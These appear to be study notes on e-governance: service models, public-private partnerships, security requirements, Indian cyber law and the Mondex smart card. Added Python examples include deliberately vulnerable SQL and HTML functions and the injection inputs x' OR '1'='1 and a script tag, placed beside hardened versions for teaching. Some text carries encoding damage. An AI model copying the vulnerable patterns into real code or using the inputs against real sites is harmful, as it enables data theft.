Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budget for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is a location-transparent, language-independent, implementation-independent and Operating System-independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, or any new Web application, or could even be a database environment using Oracle, etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Sockets Layer (SSL) is popular with Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly

G2B (Government to Business)

Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B) – refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G) – professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally, but not always, involving:

  – Long Term Contracts

  – User Charges and/or Payments flowing between the Parties

  – Shared Investments, but Mainly Private

  – Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations

• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition – For and In the Market

The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:

• Shared goals

• Shared resources (time, money, expertise, people)

• Shared risks

• Shared benefits

Benefits

• Expedited project completion

• Project cost savings

• Improved quality

• Use of private resources

• Access to new sources of private capital

Two Major Steps

• Crafting the Partnership

• Implementing the Partnership

Project Management – Six Distinct Phases

1. Genesis

  o What's the need?

  o What's driving the need / rationale? Facility non-compliance, natural disaster, budget deficit

  o Is there a need for a Public/Private Partnership?

2. Preliminary Project Definition

  o Feasibility: Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

  o Market Research

  o Economic/Financial Analysis

  o Program, Budget and Schedule

  o Risk Analysis

3. Plan and Test

  o Final project definition: What is the best way to complete the project? Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?

  o Master Schedule/Budget

  o Political Climate

  o Any potential "fatal flaws" that could derail the project?

4. Procurement and Contracting

  o How do you choose and contract with the best-value private partner?

  o What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build

  o What do current statutes allow?

  o Procurement Approach: Sole Source, RFP, Low Bid

  o Risk Allocation between Public and Private Partners

  o Structuring of Contract / Risks and Rewards

5. Implement

  o Environmental

  o Design

  o Permitting

  o Construction

  o Commissioning and Administration

6. Operate

  o Startup

  o Monitoring

  o Assessment

  o Enhancement

  o Contract Modifications

  o Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index tend also to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

• understanding an organization's information security requirements and the need to establish policy and objectives for information security;

• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

• monitoring and reviewing the performance and effectiveness of the ISMS;

• continual improvement based on objective measurement.

Data security requires a set of security requirements:

• Authentication – the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.

• Authorization – the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.

• Confidentiality – the capability to prevent unauthorized access to information.

• Integrity – the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

• Traceability – the capability to chronologically interrelate any transaction to the person or system that performed the action, in a way that is verifiable.

• Non-repudiation – the capability to prevent the person or system intervening in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are shown below:

• Protecting premises, equipment and systems software, including input-output units

• Protecting software applications used to process personal data

• Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks

• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data

• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and of the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
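Traceability and integrity from the requirements list above, as an added example that is not part of the original notes: an append-only audit log in which every entry carries an HMAC over its own fields and the previous entry's MAC, so that altering, inserting or reordering a past record is detectable and each recorded action stays attributable to the actor that performed it. The key, the actor names, the resource identifiers and the sample records are constructed placeholders, and the function names are assumptions made for this example.

```python
import hashlib
import hmac
import json

# Constructed key for the demo only. In a deployment the key would live in an
# HSM or key-management service and be unavailable to the application users
# whose actions are being logged (assumption, not from the page).
AUDIT_KEY = b"demo-audit-key-not-for-production"

GENESIS_MAC = "0" * 64  # value chained into the first entry


def _entry_mac(key: bytes, prev_mac: str, record: dict) -> str:
    """MAC over the previous MAC plus a canonical encoding of this record.

    Chaining prev_mac in makes every MAC depend on the whole history before it,
    so a change to an older entry invalidates every later one as well.
    """
    payload = prev_mac.encode() + json.dumps(record, sort_keys=True).encode()
    return hmac.new(key, payload, hashlib.sha256).hexdigest()


def append_entry(log: list, actor: str, action: str, resource: str,
                 timestamp: str, key: bytes = AUDIT_KEY) -> dict:
    """Append one attributable action (who, what, on which resource, when)."""
    prev = log[-1]["mac"] if log else GENESIS_MAC
    record = {
        "seq": len(log) + 1,      # position in the chain, checked on verify
        "time": timestamp,
        "actor": actor,
        "action": action,
        "resource": resource,
    }
    entry = {**record, "mac": _entry_mac(key, prev, record)}
    log.append(entry)
    return entry


def verify_log(log: list, key: bytes = AUDIT_KEY):
    """Return the index of the first entry that fails verification, else None.

    Catches edited fields, a recomputed-but-unkeyed MAC, and a removed or
    reordered entry (the seq check). Truncation of the tail is not detectable
    here; a separately stored count or a periodic anchor is needed for that.
    """
    prev = GENESIS_MAC
    for i, entry in enumerate(log):
        record = {k: v for k, v in entry.items() if k != "mac"}
        expected = _entry_mac(key, prev, record)
        if record.get("seq") != i + 1 or not hmac.compare_digest(entry["mac"], expected):
            return i
        prev = entry["mac"]
    return None


def trace(log: list, resource: str) -> list:
    """All logged actions on one resource, in chronological order."""
    return [e for e in log if e["resource"] == resource]


if __name__ == "__main__":
    # Constructed sample records standing in for portal activity.
    log = []
    append_entry(log, "clerk-17", "read", "citizen/123", "2024-01-01T10:00:00Z")
    append_entry(log, "clerk-17", "update", "citizen/123", "2024-01-01T10:05:00Z")
    append_entry(log, "batch-job", "read", "citizen/999", "2024-01-01T11:00:00Z")
    print("intact:", verify_log(log))            # None
    print("history of citizen/123:", [e["action"] for e in trace(log, "citizen/123")])
    log[1]["actor"] = "someone-else"              # attempt to shift the blame
    print("after tampering, first bad entry:", verify_log(log))  # 1
```

The check that matters operationally is `verify_log` run by a party that holds the key but cannot write to the application, for example a log collector; if the application server holds the key, an attacker on that server can re-sign whatever they like, which is why the key placement above is called out as an assumption.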

Despite this, trusted security and privacy measures constitute a crucial success factor for e-Government that has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

• Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis

• Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness

• Continually improve its control environment

• Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
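The two vulnerability classes named above, shown beside their fixes as an added example (this is not code from the page, nor from any e-Government portal): a lookup query built by string concatenation next to the same query with a bound parameter, and an HTML fragment that reflects user input raw next to one that encodes it. The in-memory SQLite table, its two sample rows, the tautology string and the function names are all constructed for this example.

```python
import html
import sqlite3

# Constructed sample rows standing in for a portal's user table (not real data).
SAMPLE_USERS = [
    ("alice", "Alice Kumar", "alice@example.invalid"),
    ("bob", "Bob Singh", "bob@example.invalid"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, full_name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """SQL injection: the input is spliced into the statement text, so any
    quote characters in it change the meaning of the query."""
    sql = "SELECT username, full_name FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Hardened form: a bound parameter is sent to the engine as data, so the
    statement's structure is fixed before the input is ever seen."""
    sql = "SELECT username, full_name FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def render_greeting_vulnerable(display_name: str) -> str:
    """XSS: user-controlled text is concatenated straight into HTML, so markup
    inside it becomes part of the page the browser executes."""
    return "<p>Welcome, " + display_name + "</p>"


def render_greeting_safe(display_name: str) -> str:
    """Hardened form: HTML-encode the value in this (element-content) context,
    so '<', '>', '&' and quotes are shown as text instead of parsed as markup."""
    return "<p>Welcome, " + html.escape(display_name, quote=True) + "</p>"


if __name__ == "__main__":
    conn = make_db()
    tautology = "x' OR '1'='1"            # constructed input; no such username exists
    print(lookup_vulnerable(conn, tautology))   # both rows: the WHERE clause was rewritten
    print(lookup_safe(conn, tautology))         # []: compared as a literal string
    marker = "<script>x</script>"               # constructed input
    print(render_greeting_vulnerable(marker))   # script element reaches the page
    print(render_greeting_safe(marker))         # shown as harmless text
```

The fix for the query side is structural rather than filter-based: `lookup_safe` never inspects the input, it only stops treating it as code, which is why it also works for names that legitimately contain an apostrophe. The encoding in `render_greeting_safe` is specific to HTML element content; a value placed into a JavaScript string, a URL or an attribute needs the encoder for that context instead.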

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. 'Offence' is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target, or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

• 121 Million Internet Users

• 65 Million Active Internet Users, up by 28% from 51 million in 2010

• 50 Million users shop online on Ecommerce and Online Shopping Sites

• 46+ Million Social Network Users

• 346 million mobile users had subscribed to Data Packages

CYBER LAW

(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or Damage to the public or any person, Destroys or Deletes or Alters any Information Residing in a Computer Resource or diminishes its value or utility or affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever without permission of the owner of the computer:

• Secures Access

• Downloads, Copies or extracts any data, computer database or any information

• Introduces or causes to be introduced any Virus or Contaminant

• Disrupts or causes disruption

• Denies or causes denial of access to any person

• Provides any assistance to any person to facilitate access

• Charges the services availed of by a person to the account of another person by Tampering with or Manipulating any Computer, Computer System or Computer Network

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

• Destroys, Deletes or Alters any Information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means

• Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years or with fine which may extend to five lakh rupees or with both." [S66]

S66A – Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

• Any information that is grossly offensive or has menacing character; or

• Any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or

• Any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience or to deceive or to mislead the addressee or recipient about the origin of such messages

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C – Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D – Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E – Punishment for violation of privacy

"Whoever intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A – Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C – Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."

IT ACT

The Information Technology Act, 2000 (also known as ITA-2000, or the IT Act) is an Act of the Indian Parliament (No 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced. Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents

2. Legal recognition of digital signatures

3. Offences and contraventions

4. Justice dispensation systems for cybercrimes

Offences –

Section | Offence | Punishment

65 | Tampering with computer source documents – intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years, or/and with fine up to 2 lakh rupees

66 | Hacking | Imprisonment up to three years, or/and with fine up to 5 lakh rupees

66-A | Sending offensive message through electronic means – sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.

Why Smart Cards –

• Improve the convenience and security of any transaction

• Provide tamper-proof storage of user and account identity

• Provide vital components of system security

• Protect against a full range of security threats

Advantages –

• Flexibility

• Security

• Portability

• Increasing data storage capacity

• Reliability

Schematic overview of a smart card

Smart card Processing

Smart Card Applications –

• Ticketless travel

  o Seoul bus system: 4M cards, 1B transactions since 1996

  o Planned for the SF Bay Area system

• Authentication, ID

• Medical records

• Ecash

• Store loyalty programs

• Personal profiles

• Government

  o Licenses

• Mall parking

Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

• Direct transfer of electronic money between two cards

• Transfer of electronic money over the Internet or telephone networks, etc.

• Keeps transaction records

• Password protection and "lock card" functions

• Portable balance finder to check balance

• Supports multiple currencies

ADVANTAGES

CONSUMER –

• Convenience

• Accessibility

• On-chip record of recent transactions

• Home load

• Internet purchases

MERCHANT –

• Reliable off-line payment

• Higher security

• Low transaction cost

• Reduced cash handling

FINANCIAL INSTITUTION –

• Strengthen customer relationships

• New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year, MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy –

Principles protected:

  o Limits for collecting personal information

  o Limits for using, disclosing and keeping personal information

  o Keeping personal information accurate

  o Safeguarding personal information

Limits for collecting personal information

  o loads from account

  o deposits into account

  o lost transactions

Limits for using, disclosing and keeping personal information

  o safeguard deposits

  o to reimburse for non-performance

Keeping personal information accurate

  o load and unload are online

  o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information

  o firewalls in Multos, between applications (ITSEC 6 designation)

  o transaction data to retailer is deliberately limited

  o individual transaction data is not collected by banks; Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50 dollars. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.
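The overflow problem just described, as an added illustration that is not Mondex's own code or protocol: a toy model of an offline card-to-card transfer in which each card keeps the rolling 10-entry transaction record the notes mention, plus the check a bank could run when a card's log is next uploaded. The monotonic per-card sequence counter, the `Card` structure, the function names and the sample transfers are assumptions made for this example; the real card's data layout and upload protocol are not described on the page and are not modelled.

```python
from collections import deque
from dataclasses import dataclass, field

LOG_CAPACITY = 10  # the notes say the card keeps a rolling 10-transaction record


@dataclass
class Card:
    card_id: str
    balance: int              # stored value in minor units (e.g. pence); constructed
    seq: int = 0              # monotonic transaction counter (assumption, not from the page)
    # Bounded ring buffer: once full, each new entry silently evicts the oldest.
    log: deque = field(default_factory=lambda: deque(maxlen=LOG_CAPACITY))

    def record(self, kind: str, amount: int, counterparty: str) -> None:
        self.seq += 1
        self.log.append((self.seq, kind, amount, counterparty))


def transfer(payer: Card, payee: Card, amount: int) -> None:
    """Offline value transfer between two cards: no bank is in the loop, so the
    only controls are the ones the cards themselves enforce."""
    if amount <= 0:
        raise ValueError("amount must be positive")
    if payer.balance < amount:
        raise ValueError("insufficient value on card")
    payer.balance -= amount
    payee.balance += amount
    payer.record("debit", amount, payee.card_id)
    payee.record("credit", amount, payer.card_id)


def audit_gap(card: Card, last_uploaded_seq: int) -> int:
    """Number of transactions the back end can no longer recover from this card.

    Everything with seq <= last_uploaded_seq is already at the bank. Anything
    newer must still be in the card's rolling log, or it has been overwritten
    and is lost: the counter proves it happened, but not to whom or for how much.
    """
    newer = card.seq - last_uploaded_seq
    retained = sum(1 for seq, *_ in card.log if seq > last_uploaded_seq)
    return newer - retained


def upload(card: Card, last_uploaded_seq: int) -> tuple:
    """What a bank-side upload would receive: the retained entries and the
    size of the hole in the audit trail. Returns (entries, gap, new_high_seq)."""
    entries = [e for e in card.log if e[0] > last_uploaded_seq]
    return entries, audit_gap(card, last_uploaded_seq), card.seq


if __name__ == "__main__":
    alice = Card("card-A", balance=1000)   # constructed sample cards
    shop = Card("card-M", balance=0)
    for _ in range(12):                    # twelve purchases before any upload
        transfer(alice, shop, 10)
    entries, gap, high = upload(alice, last_uploaded_seq=0)
    print(len(entries), "entries retained,", gap, "lost, counter at", high)  # 10 2 12
```

The defensive point is that a bounded log can only be made auditable by bounding the number of transactions between uploads, and the counter is what lets the back end notice when that bound was exceeded; with the log alone (no counter), the bank would see ten well-formed entries and have no evidence that two more ever occurred.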

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance

